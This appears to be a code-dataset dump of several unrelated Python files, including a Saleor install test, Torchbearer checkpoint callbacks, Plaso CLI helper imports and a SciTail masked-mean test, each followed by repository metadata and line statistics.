}
settings = get_settings()
response = MagicMock()
response.__getitem__.side_effect = json_failed_response.__getitem__
response.get.side_effect = json_failed_response.get
errors = None
mocked_executor = AsyncMock(return_value=(response, errors))
monkeypatch.setattr(
"saleor_app.install.get_executor", lambda host, auth_token: mocked_executor
)
monkeypatch.setattr("saleor_app.install.secrets.choice", lambda _: "a")
save_app_data_fun = AsyncMock()
events = ["ORDER_CREATED", "PRODUCT_CREATED"]
target_url = "saleor.io/app/webhook-url"
saleor_store_domain = "saleor.io"
saleor_app_token = "saleor-token"
with pytest.raises(InstallAppError):
await install_app(
domain=saleor_store_domain,
token=saleor_app_token,
events=events,
target_url=target_url,
save_app_data=save_app_data_fun,
)
expected_secret_key = "a" * 20
variables = {
"input": {
"targetUrl": target_url,
"events": [event.upper() for event in events],
"name": settings.app_name,
"secretKey": expected_secret_key,
}
}
mocked_executor.assert_awaited_once_with(CREATE_WEBHOOK, variables=variables)
assert not save_app_data_fun.called
| 30.177778
| 87
| 0.638255
| 589
| 5,432
| 5.519525
| 0.168081
| 0.049831
| 0.040603
| 0.038757
| 0.82713
| 0.791449
| 0.791449
| 0.779145
| 0.743156
| 0.743156
| 0
| 0.002012
| 0.267857
| 5,432
| 179
| 88
| 30.346369
| 0.815439
| 0
| 0
| 0.62
| 0
| 0
| 0.138807
| 0.049153
| 0
| 0
| 0
| 0
| 0.04
| 1
| 0
| false
| 0
| 0.046667
| 0
| 0.046667
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 6
|
4b12822e6d65a0051203be96bd6a9d55228e0811
| 24
|
py
|
Python
|
testsuite/modulegraph-dir/package/diamond_b2.py
|
xoviat/modulegraph2
|
766d00bdb40e5b2fe206b53a87b1bce3f9dc9c2a
|
[
"MIT"
] | 9
|
2020-03-22T14:48:01.000Z
|
2021-05-30T12:18:12.000Z
|
testsuite/modulegraph-dir/package/diamond_b2.py
|
xoviat/modulegraph2
|
766d00bdb40e5b2fe206b53a87b1bce3f9dc9c2a
|
[
"MIT"
] | 15
|
2020-01-06T10:02:32.000Z
|
2021-05-28T12:22:44.000Z
|
testsuite/modulegraph-dir/package/diamond_b1.py
|
ronaldoussoren/modulegraph2
|
b6ab1766b0098651b51083235ff8a18a5639128b
|
[
"MIT"
] | 4
|
2020-05-10T18:51:41.000Z
|
2021-04-07T14:03:12.000Z
|
from . import diamond_c
| 12
| 23
| 0.791667
| 4
| 24
| 4.5
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.166667
| 24
| 1
| 24
| 24
| 0.9
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 1
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 6
|
d9b1e45b721b1c4c1a7bb9086b5edb5d571088f0
| 98
|
py
|
Python
|
app/diagnostic/__init__.py
|
benjaminhuanghuang/math_clone
|
8fd5d5ed878559629101c6c33d61f2ead80a652c
|
[
"MIT"
] | null | null | null |
app/diagnostic/__init__.py
|
benjaminhuanghuang/math_clone
|
8fd5d5ed878559629101c6c33d61f2ead80a652c
|
[
"MIT"
] | null | null | null |
app/diagnostic/__init__.py
|
benjaminhuanghuang/math_clone
|
8fd5d5ed878559629101c6c33d61f2ead80a652c
|
[
"MIT"
] | null | null | null |
from flask import Blueprint
diagnostic = Blueprint('diagnostic', __name__)
from . import routes
| 16.333333
| 46
| 0.785714
| 11
| 98
| 6.636364
| 0.636364
| 0.520548
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.142857
| 98
| 5
| 47
| 19.6
| 0.869048
| 0
| 0
| 0
| 0
| 0
| 0.102041
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0.666667
| 0
| 0.666667
| 0.666667
| 1
| 0
| 0
| null | 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 1
|
0
| 6
|
d9b3557149df02201695555cb8fb1b5b4718254e
| 208
|
py
|
Python
|
users/admin.py
|
MaTachi/sputnik
|
81f170f4ed25c0d0db7816dd875e8ac148ebba3b
|
[
"MIT"
] | null | null | null |
users/admin.py
|
MaTachi/sputnik
|
81f170f4ed25c0d0db7816dd875e8ac148ebba3b
|
[
"MIT"
] | null | null | null |
users/admin.py
|
MaTachi/sputnik
|
81f170f4ed25c0d0db7816dd875e8ac148ebba3b
|
[
"MIT"
] | null | null | null |
from django.contrib import admin
from users.models import PersonalUserProfile
class PersonalUserProfileAdmin(admin.ModelAdmin):
pass
admin.site.register(PersonalUserProfile, PersonalUserProfileAdmin)
| 20.8
| 66
| 0.846154
| 20
| 208
| 8.8
| 0.7
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.100962
| 208
| 9
| 67
| 23.111111
| 0.941176
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0.2
| 0.4
| 0
| 0.6
| 0
| 1
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| 1
| 0
| 1
| 0
|
0
| 6
|
d9c95baf8199a4048e75a23cee095f221a7b3ab7
| 96
|
py
|
Python
|
venv/lib/python3.8/site-packages/rope/base/oi/type_hinting/evaluate.py
|
GiulianaPola/select_repeats
|
17a0d053d4f874e42cf654dd142168c2ec8fbd11
|
[
"MIT"
] | 2
|
2022-03-13T01:58:52.000Z
|
2022-03-31T06:07:54.000Z
|
venv/lib/python3.8/site-packages/rope/base/oi/type_hinting/evaluate.py
|
DesmoSearch/Desmobot
|
b70b45df3485351f471080deb5c785c4bc5c4beb
|
[
"MIT"
] | 19
|
2021-11-20T04:09:18.000Z
|
2022-03-23T15:05:55.000Z
|
venv/lib/python3.8/site-packages/rope/base/oi/type_hinting/evaluate.py
|
DesmoSearch/Desmobot
|
b70b45df3485351f471080deb5c785c4bc5c4beb
|
[
"MIT"
] | null | null | null |
/home/runner/.cache/pip/pool/1f/9b/1e/32db7f302799db2358287293395973ca876e177f4dff9f20e8d171c508
| 96
| 96
| 0.895833
| 9
| 96
| 9.555556
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.46875
| 0
| 96
| 1
| 96
| 96
| 0.427083
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | null | 0
| 0
| null | null | 0
| 1
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 1
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 1
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 6
|
d9d208eda4c74e9ff892ae39dea8336d6e31fc86
| 14,595
|
py
|
Python
|
torchbearer/callbacks/checkpointers.py
|
NunoEdgarGFlowHub/torchbearer
|
d2b21b8ffcabde5b505cb1c736e05af6ee4276ca
|
[
"MIT"
] | 358
|
2018-07-23T13:30:38.000Z
|
2019-06-02T07:18:35.000Z
|
torchbearer/callbacks/checkpointers.py
|
NunoEdgarGFlowHub/torchbearer
|
d2b21b8ffcabde5b505cb1c736e05af6ee4276ca
|
[
"MIT"
] | 307
|
2018-07-18T12:07:23.000Z
|
2019-06-03T18:00:27.000Z
|
torchbearer/callbacks/checkpointers.py
|
NunoEdgarGFlowHub/torchbearer
|
d2b21b8ffcabde5b505cb1c736e05af6ee4276ca
|
[
"MIT"
] | 42
|
2018-07-23T22:49:23.000Z
|
2019-05-20T07:22:55.000Z
|
import torchbearer
import torch
from torchbearer.callbacks.callbacks import Callback
import os
import warnings
from torchbearer.bases import get_metric
class _Checkpointer(Callback):
def __init__(self, fileformat, save_model_params_only=False, pickle_module=torch.serialization.pickle, pickle_protocol=torch.serialization.DEFAULT_PROTOCOL):
super(_Checkpointer, self).__init__()
self.fileformat = fileformat
self.pickle_module = pickle_module
self.pickle_protocol = pickle_protocol
self.save_model_params_only = save_model_params_only
self.most_recent = None
if fileformat.__contains__(os.sep) and not os.path.exists(os.path.dirname(fileformat)):
os.makedirs(os.path.dirname(fileformat))
def save_checkpoint(self, model_state, overwrite_most_recent=False):
state = {}
state.update(model_state)
state.update(model_state[torchbearer.METRICS])
string_state = {str(key): state[key] for key in state.keys()}
filepath = self.fileformat.format(**string_state)
if self.most_recent is not None and overwrite_most_recent:
try:
os.remove(self.most_recent)
except OSError:
warnings.warn('Failed to delete old file. Are you running two checkpointers with the same filename?')
if self.save_model_params_only:
torch.save(model_state[torchbearer.MODEL].state_dict(), filepath, pickle_module=self.pickle_module,
pickle_protocol=self.pickle_protocol)
else:
torch.save(model_state[torchbearer.SELF].state_dict(), filepath, pickle_module=self.pickle_module,
pickle_protocol=self.pickle_protocol)
self.most_recent = filepath
def ModelCheckpoint(filepath='model.{epoch:02d}-{val_loss:.2f}.pt', save_model_params_only=False,
                    monitor='val_loss', save_best_only=False, mode='auto', period=1, min_delta=0):
    """Factory returning a checkpointing callback that saves the model each epoch.

    `filepath` may contain `str.format` fields which are filled from the trial
    state: e.g. `weights.{epoch:02d}-{val_loss:.2f}` embeds the epoch number
    and the validation loss in the saved filename. The torch :class:`.Trial`
    will be saved to filename.

    Example: ::

        >>> from torchbearer.callbacks import ModelCheckpoint
        >>> from torchbearer import Trial
        >>> import torch

        # Example Trial (without optimiser or loss criterion) which uses this checkpointer
        >>> model = torch.nn.Linear(1,1)
        >>> checkpoint = ModelCheckpoint('my_path.pt', monitor='val_acc', mode='max')
        >>> trial = Trial(model, callbacks=[checkpoint], metrics=['acc'])

    Args:
        filepath (str): Path to save the model file
        save_model_params_only (bool): When True, only model parameters are
            saved (loadable into a PyTorch nn.Module); when False, the saved
            state should be loaded into a Torchbearer Trial object later
        monitor (str): Quantity to monitor
        save_best_only (bool): When True, only the latest best model according
            to the monitored quantity is kept (it is not overwritten by worse
            models)
        mode (str): One of {auto, min, max}: the direction of improvement for
            the monitored quantity when `save_best_only=True`. Use `max` for
            `val_acc`, `min` for `val_loss`; `auto` infers the direction from
            the monitor's name
        period (int): Interval (number of epochs) between checkpoints
        min_delta (float): When `save_best_only=True`, the minimum improvement
            required to trigger a save

    State Requirements:
        - :attr:`torchbearer.state.MODEL`: Model should have the `state_dict` method
        - :attr:`torchbearer.state.METRICS`: Metrics dictionary should exist
        - :attr:`torchbearer.state.SELF`: Self should be the :attr:`torchbearer.Trial` which is running this callback
    """
    if save_best_only:
        return Best(filepath, save_model_params_only, monitor, mode, period, min_delta)
    return Interval(filepath, save_model_params_only, period)
class MostRecent(_Checkpointer):
    """Model checkpointer which saves the most recent model to a given filepath. `filepath` can contain named
    formatting options, which will be filled any values from state. For example: if `filepath` is
    `weights.{epoch:02d}-{val_loss:.2f}`, then the model checkpoints will be saved with the epoch number and the
    validation loss in the filename.

    Example: ::

        >>> from torchbearer.callbacks import MostRecent
        >>> from torchbearer import Trial
        >>> import torch

        # Example Trial (without optimiser or loss criterion) which uses this checkpointer
        >>> model = torch.nn.Linear(1,1)
        >>> checkpoint = MostRecent('my_path.pt')
        >>> trial = Trial(model, callbacks=[checkpoint], metrics=['acc'])

    Args:
        filepath (str): Path to save the model file
        save_model_params_only (bool): If `save_model_params_only=True`, only model parameters will be saved so that
            the results can be loaded into a PyTorch nn.Module. The other option, `save_model_params_only=False`,
            should be used only if the results will be loaded into a Torchbearer Trial object later.
        pickle_module (module): The pickle module to use, default is 'torch.serialization.pickle'
        pickle_protocol (int): The pickle protocol to use, default is 'torch.serialization.DEFAULT_PROTOCOL'

    State Requirements:
        - :attr:`torchbearer.state.MODEL`: Model should have the `state_dict` method
        - :attr:`torchbearer.state.METRICS`: Metrics dictionary should exist
        - :attr:`torchbearer.state.SELF`: Self should be the :attr:`torchbearer.Trial` which is running this callback
    """
    def __init__(self, filepath='model.{epoch:02d}-{val_loss:.2f}.pt', save_model_params_only=False,
                 pickle_module=torch.serialization.pickle, pickle_protocol=torch.serialization.DEFAULT_PROTOCOL):
        super(MostRecent, self).__init__(filepath, save_model_params_only=save_model_params_only,
                                         pickle_module=pickle_module, pickle_protocol=pickle_protocol)
        self.filepath = filepath

    def on_checkpoint(self, state):
        # Fix: delegate to the matching base hook. The original called
        # super().on_end_epoch from inside on_checkpoint (apparently a
        # copy-paste slip); base Callback hooks are presumed to be no-op
        # stubs, so behaviour is unchanged -- TODO confirm against Callback.
        super(MostRecent, self).on_checkpoint(state)
        # Always overwrite the previous save: only the latest model is kept.
        self.save_checkpoint(state, overwrite_most_recent=True)
class Best(_Checkpointer):
    """Model checkpointer which saves the best model according to the given configurations. `filepath` can contain
    named formatting options, which will be filled any values from state. For example: if `filepath` is
    `weights.{epoch:02d}-{val_loss:.2f}`, then the model checkpoints will be saved with the epoch number and the
    validation loss in the filename.

    Example: ::

        >>> from torchbearer.callbacks import Best
        >>> from torchbearer import Trial
        >>> import torch

        # Example Trial (without optimiser or loss criterion) which uses this checkpointer
        >>> model = torch.nn.Linear(1,1)
        >>> checkpoint = Best('my_path.pt', monitor='val_acc', mode='max')
        >>> trial = Trial(model, callbacks=[checkpoint], metrics=['acc'])

    Args:
        filepath (str): Path to save the model file
        save_model_params_only (bool): If `save_model_params_only=True`, only model parameters will be saved so that
            the results can be loaded into a PyTorch nn.Module. The other option, `save_model_params_only=False`,
            should be used only if the results will be loaded into a Torchbearer Trial object later.
        monitor (str): Quantity to monitor
        mode (str): One of {auto, min, max}. The decision to overwrite the current save file is made based on either
            the maximization or the minimization of the monitored quantity. For `val_acc`, this should be `max`, for
            `val_loss` this should be `min`, etc. In `auto` mode, the direction is automatically inferred from the
            name of the monitored quantity (names containing 'acc' are maximised).
        period (int): Interval (number of epochs) between checkpoints
        min_delta (float): The minimum improvement required to trigger a save
        pickle_module (module): The pickle module to use, default is 'torch.serialization.pickle'
        pickle_protocol (int): The pickle protocol to use, default is 'torch.serialization.DEFAULT_PROTOCOL'

    State Requirements:
        - :attr:`torchbearer.state.MODEL`: Model should have the `state_dict` method
        - :attr:`torchbearer.state.METRICS`: Metrics dictionary should exist, with the `monitor` key populated
        - :attr:`torchbearer.state.SELF`: Self should be the :attr:`torchbearer.Trial` which is running this callback
    """
    def __init__(self, filepath='model.{epoch:02d}-{val_loss:.2f}.pt', save_model_params_only=False, monitor='val_loss',
                 mode='auto', period=1, min_delta=0, pickle_module=torch.serialization.pickle,
                 pickle_protocol=torch.serialization.DEFAULT_PROTOCOL):
        super(Best, self).__init__(filepath, save_model_params_only=save_model_params_only,
                                   pickle_module=pickle_module, pickle_protocol=pickle_protocol)
        self.min_delta = min_delta
        self.mode = mode
        self.monitor = monitor
        self.period = period
        self.epochs_since_last_save = 0

        # 'auto' (or any unrecognised) mode: infer the direction from the
        # monitored quantity's name.
        if self.mode not in ['min', 'max']:
            self.mode = 'max' if 'acc' in self.monitor else 'min'

        if self.mode == 'min':
            self.min_delta *= -1
            self.monitor_op = lambda x1, x2: (x1 - self.min_delta) < x2
        else:
            # self.mode == 'max' is guaranteed here. (A dead no-op
            # `self.min_delta *= 1` was removed from this branch.)
            self.monitor_op = lambda x1, x2: (x1 - self.min_delta) > x2

        # Resolved lazily in on_start so it can be restored from a state_dict.
        self.best = None

    def state_dict(self):
        """Serialise the epoch counter and best value for later resume."""
        state_dict = super(Best, self).state_dict()
        state_dict['epochs'] = self.epochs_since_last_save
        state_dict['best'] = self.best
        return state_dict

    def load_state_dict(self, state_dict):
        """Restore the epoch counter and best value. Returns self."""
        super(Best, self).load_state_dict(state_dict)
        self.epochs_since_last_save = state_dict['epochs']
        self.best = state_dict['best']
        return self

    def on_start(self, state):
        # Initialise `best` to the worst possible value unless it was already
        # restored from a state_dict.
        if self.best is None:
            self.best = float('inf') if self.mode == 'min' else -float('inf')

    def on_checkpoint(self, state):
        # Fix: delegate to the matching base hook. The original called
        # super().on_end_epoch here (apparently a copy-paste slip); base
        # Callback hooks are presumed to be no-op stubs, so behaviour is
        # unchanged -- TODO confirm against Callback.
        super(Best, self).on_checkpoint(state)
        self.epochs_since_last_save += 1

        if self.epochs_since_last_save >= self.period:
            self.epochs_since_last_save = 0

            current = get_metric('Best Checkpoint', state, self.monitor)
            if current is None:
                # Metric missing from state: nothing to compare against.
                return

            if self.monitor_op(current, self.best):
                self.best = current
                self.save_checkpoint(state, overwrite_most_recent=True)
class Interval(_Checkpointer):
    """Model checkpointer which saves the model every 'period' steps to the given filepath. `filepath` can
    contain named formatting options, which will be filled any values from state. For example: if `filepath` is
    `weights.{epoch:02d}-{val_loss:.2f}`, then the model checkpoints will be saved with the epoch number and the
    validation loss in the filename.

    Example: ::

        >>> from torchbearer.callbacks import Interval
        >>> from torchbearer import Trial
        >>> import torch

        # Example Trial (without optimiser or loss criterion) which uses this checkpointer
        >>> model = torch.nn.Linear(1,1)
        >>> checkpoint = Interval('my_path.pt', period=100, on_batch=True)
        >>> trial = Trial(model, callbacks=[checkpoint], metrics=['acc'])

    Args:
        filepath (str): Path to save the model file
        save_model_params_only (bool): If `save_model_params_only=True`, only model parameters will be saved so that
            the results can be loaded into a PyTorch nn.Module. The other option, `save_model_params_only=False`,
            should be used only if the results will be loaded into a Torchbearer Trial object later.
        period (int): Interval (number of steps) between checkpoints; steps are
            batches when `on_batch=True`, epochs otherwise
        on_batch (bool): If True step each batch, if False step each epoch
        pickle_module (module): The pickle module to use, default is 'torch.serialization.pickle'
        pickle_protocol (int): The pickle protocol to use, default is 'torch.serialization.DEFAULT_PROTOCOL'

    State Requirements:
        - :attr:`torchbearer.state.MODEL`: Model should have the `state_dict` method
        - :attr:`torchbearer.state.METRICS`: Metrics dictionary should exist
        - :attr:`torchbearer.state.SELF`: Self should be the :attr:`torchbearer.Trial` which is running this callback
    """
    def __init__(self, filepath='model.{epoch:02d}-{val_loss:.2f}.pt', save_model_params_only=False, period=1,
                 on_batch=False, pickle_module=torch.serialization.pickle,
                 pickle_protocol=torch.serialization.DEFAULT_PROTOCOL):
        super(Interval, self).__init__(filepath, save_model_params_only=save_model_params_only,
                                       pickle_module=pickle_module, pickle_protocol=pickle_protocol)
        self.period = period
        self.epochs_since_last_save = 0

        if on_batch:
            # Step per training batch instead of per epoch: move the
            # checkpoint logic onto the batch hook and disable the
            # epoch-level one.
            self.on_step_training = self.on_checkpoint
            self.on_checkpoint = lambda _: None

    def state_dict(self):
        """Serialise the step counter for later resume."""
        state_dict = super(Interval, self).state_dict()
        state_dict['epochs'] = self.epochs_since_last_save
        return state_dict

    def load_state_dict(self, state_dict):
        """Restore the step counter. Returns self."""
        super(Interval, self).load_state_dict(state_dict)
        self.epochs_since_last_save = state_dict['epochs']
        return self

    def on_checkpoint(self, state):
        # Fix: delegate to the matching base hook. The original called
        # super().on_end_epoch here (apparently a copy-paste slip); base
        # Callback hooks are presumed to be no-op stubs, so behaviour is
        # unchanged -- TODO confirm against Callback.
        super(Interval, self).on_checkpoint(state)
        self.epochs_since_last_save += 1

        if self.epochs_since_last_save >= self.period:
            self.epochs_since_last_save = 0
            self.save_checkpoint(state)
| 48.327815
| 223
| 0.681672
| 1,917
| 14,595
| 5.016693
| 0.10433
| 0.028075
| 0.043673
| 0.055319
| 0.807112
| 0.777269
| 0.75065
| 0.744723
| 0.72611
| 0.715504
| 0
| 0.00498
| 0.229531
| 14,595
| 301
| 224
| 48.488372
| 0.850245
| 0.535389
| 0
| 0.291667
| 0
| 0
| 0.051424
| 0.022152
| 0
| 0
| 0
| 0
| 0
| 1
| 0.116667
| false
| 0
| 0.05
| 0
| 0.25
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 6
|
d9e759310c2966aaf37e58b76b551d9e8e40db8a
| 1,886
|
py
|
Python
|
plaso/cli/helpers/__init__.py
|
dfrc-korea/plaso
|
2c74c3586f94d3ddf9ff523fbdc8cb42d950a109
|
[
"Apache-2.0"
] | 27
|
2019-04-05T12:01:49.000Z
|
2022-02-08T02:26:25.000Z
|
plaso/cli/helpers/__init__.py
|
dfrc-korea/plaso
|
2c74c3586f94d3ddf9ff523fbdc8cb42d950a109
|
[
"Apache-2.0"
] | null | null | null |
plaso/cli/helpers/__init__.py
|
dfrc-korea/plaso
|
2c74c3586f94d3ddf9ff523fbdc8cb42d950a109
|
[
"Apache-2.0"
] | 8
|
2019-11-28T08:06:34.000Z
|
2020-08-29T13:53:30.000Z
|
# -*- coding: utf-8 -*-
"""This file imports Python modules that register CLI helpers."""
from plaso.cli.helpers import analysis_plugins
from plaso.cli.helpers import artifact_definitions
from plaso.cli.helpers import artifact_filters
from plaso.cli.helpers import data_location
from plaso.cli.helpers import date_filters
from plaso.cli.helpers import dynamic_output
from plaso.cli.helpers import elastic_output
from plaso.cli.helpers import event_filters
from plaso.cli.helpers import extraction
from plaso.cli.helpers import filter_file
from plaso.cli.helpers import hashers
from plaso.cli.helpers import language
from plaso.cli.helpers import mysql_4n6time_output
from plaso.cli.helpers import nsrlsvr_analysis
from plaso.cli.helpers import output_modules
from plaso.cli.helpers import parsers
from plaso.cli.helpers import profiling
from plaso.cli.helpers import process_resources
from plaso.cli.helpers import sessionize_analysis
from plaso.cli.helpers import sqlite_4n6time_output
from plaso.cli.helpers import status_view
from plaso.cli.helpers import storage_file
from plaso.cli.helpers import storage_format
from plaso.cli.helpers import tagging_analysis
from plaso.cli.helpers import temporary_directory
from plaso.cli.helpers import text_prepend
from plaso.cli.helpers import timesketch_output
from plaso.cli.helpers import viper_analysis
from plaso.cli.helpers import virustotal_analysis
from plaso.cli.helpers import windows_services_analysis
from plaso.cli.helpers import xlsx_output
from plaso.cli.helpers import yara_rules
from plaso.cli.helpers import workers
from plaso.cli.helpers import mariasql_4n6time_output
# These modules do not register CLI helpers, but contain super classes used by
# CLI helpers in other modules.
from plaso.cli.helpers import database_config
from plaso.cli.helpers import server_config
from plaso.cli.helpers import shared_4n6time_output
| 42.863636
| 78
| 0.852598
| 288
| 1,886
| 5.458333
| 0.256944
| 0.254453
| 0.282443
| 0.447201
| 0.704835
| 0.498092
| 0.048346
| 0
| 0
| 0
| 0
| 0.005288
| 0.097561
| 1,886
| 43
| 79
| 43.860465
| 0.918331
| 0.100212
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 0
| 0
| 0
| null | 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 6
|
8a72705f412db17bc53e6f67f3d20be61223f0f5
| 5,810
|
py
|
Python
|
tests/nn/util_test.py
|
allenai/scitail
|
2e57f46a4620d50e85323c4a642114426db67393
|
[
"Apache-2.0"
] | 40
|
2018-02-01T04:20:50.000Z
|
2022-03-08T02:31:08.000Z
|
tests/nn/util_test.py
|
allenai/scitail
|
2e57f46a4620d50e85323c4a642114426db67393
|
[
"Apache-2.0"
] | 6
|
2018-02-06T03:41:00.000Z
|
2018-10-22T06:13:59.000Z
|
tests/nn/util_test.py
|
allenai/scitail
|
2e57f46a4620d50e85323c4a642114426db67393
|
[
"Apache-2.0"
] | 8
|
2018-02-08T09:06:16.000Z
|
2019-07-17T23:12:17.000Z
|
# pylint: disable=invalid-name,no-self-use,too-many-public-methods
import numpy
import torch
from allennlp.common.testing import AllenNlpTestCase
from numpy.testing import assert_array_almost_equal
from torch.autograd import Variable
from scitail.nn import util
class TestNnUtil(AllenNlpTestCase):
    """Tests for ``util.masked_mean`` over masked/unmasked, 1D/batched inputs."""

    @staticmethod
    def _assert_mean(values, dim, mask, expected):
        """Run ``util.masked_mean`` on *values* and compare with *expected*."""
        tensor = Variable(torch.FloatTensor(values))
        mask_tensor = None if mask is None else Variable(torch.FloatTensor(mask))
        actual = util.masked_mean(tensor, dim, mask_tensor).data.numpy()
        assert_array_almost_equal(actual, numpy.array(expected))

    def test_masked_mean_no_mask(self):
        # General unmasked 1D case.
        self._assert_mean([[1.0, 2.0, 3.0]], 1, None, [2.0])
        # Unmasked 1D case where the input is all 0s.
        self._assert_mean([[0.0, 0.0, 0.0]], 1, None, [0.0])
        # Unmasked batched case where one of the inputs is all 0s.
        self._assert_mean([[1.0, 2.0, 5.0], [0.0, 0.0, 0.0]], 1, None,
                          [2.666666, 0.0])

    def test_masked_mean_masked(self):
        # General masked 1D cases.
        self._assert_mean([[1.0, 2.0, 5.0]], 1, [[1.0, 0.0, 1.0]], [3.0])
        self._assert_mean([[0.0, 2.0, 3.0, 4.0]], 1, [[1.0, 0.0, 1.0, 1.0]],
                          [2.333333])
        # Input all 0s, mask not all 0s.
        self._assert_mean([[0.0, 0.0, 0.0, 0.0]], 1, [[0.0, 0.0, 0.0, 1.0]],
                          [0])
        # Input not all 0s, mask all 0s.
        self._assert_mean([[0.0, 2.0, 3.0, 4.0]], 1, [[0.0, 0.0, 0.0, 0.0]],
                          [0.0])
        # Input all 0s and mask all 0s.
        self._assert_mean([[0.0, 0.0, 0.0, 0.0]], 1, [[0.0, 0.0, 0.0, 0.0]],
                          [0.0])

        # General masked batched case, reduced over each dimension.
        matrix = [[1.0, 2.0, 5.0], [1.0, 2.0, 3.0]]
        mask = [[1.0, 0.0, 1.0], [1.0, 1.0, 1.0]]
        self._assert_mean(matrix, 1, mask, [3.0, 2.0])
        self._assert_mean(matrix, 0, mask, [1.0, 2.0, 4.0])

        # One input row all 0s, no mask row all 0s.
        matrix = [[0.0, 0.0, 0.0], [1.0, 2.0, 3.0]]
        mask = [[1.0, 0.0, 1.0], [1.0, 1.0, 1.0]]
        self._assert_mean(matrix, 1, mask, [0.0, 2.0])
        self._assert_mean(matrix, 0, mask, [0.5, 2.0, 1.5])

        # One input row all 0s and one mask row all 0s.
        matrix = [[0.0, 0.0, 0.0], [1.0, 2.0, 3.0]]
        mask = [[1.0, 0.0, 1.0], [0.0, 0.0, 0.0]]
        self._assert_mean(matrix, 1, mask, [0.0, 0.0])
        self._assert_mean(matrix, 0, mask, [0.0, 0.0, 0.0])

        # The all-0s mask row paired with the all-0s input row swapped around.
        matrix = [[0.0, 0.0, 0.0], [1.0, 2.0, 3.0]]
        mask = [[0.0, 0.0, 0.0], [1.0, 0.0, 1.0]]
        self._assert_mean(matrix, 1, mask, [0.0, 2.0])
        self._assert_mean(matrix, 0, mask, [1.0, 0.0, 3.0])
| 52.342342
| 80
| 0.595525
| 877
| 5,810
| 3.760547
| 0.079818
| 0.060643
| 0.064585
| 0.060643
| 0.852032
| 0.843845
| 0.836264
| 0.826258
| 0.816252
| 0.792298
| 0
| 0.076579
| 0.269535
| 5,810
| 110
| 81
| 52.818182
| 0.700518
| 0.12685
| 0
| 0.575
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.2125
| 1
| 0.025
| false
| 0
| 0.075
| 0
| 0.1125
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 6
|
8a89d4d2cb1c3d6a7d9dc787c7e2530446adbfe2
| 21
|
py
|
Python
|
unittest/sphinxExer/src/moge.py
|
terasakisatoshi/pythonCodes
|
baee095ecee96f6b5ec6431267cdc6c40512a542
|
[
"MIT"
] | null | null | null |
unittest/sphinxExer/src/moge.py
|
terasakisatoshi/pythonCodes
|
baee095ecee96f6b5ec6431267cdc6c40512a542
|
[
"MIT"
] | null | null | null |
unittest/sphinxExer/src/moge.py
|
terasakisatoshi/pythonCodes
|
baee095ecee96f6b5ec6431267cdc6c40512a542
|
[
"MIT"
] | null | null | null |
def moge():
    """Placeholder that does nothing and returns None."""
    return None
| 7
| 11
| 0.52381
| 3
| 21
| 3.666667
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.333333
| 21
| 2
| 12
| 10.5
| 0.785714
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.5
| true
| 0.5
| 0
| 0
| 0.5
| 0
| 1
| 1
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
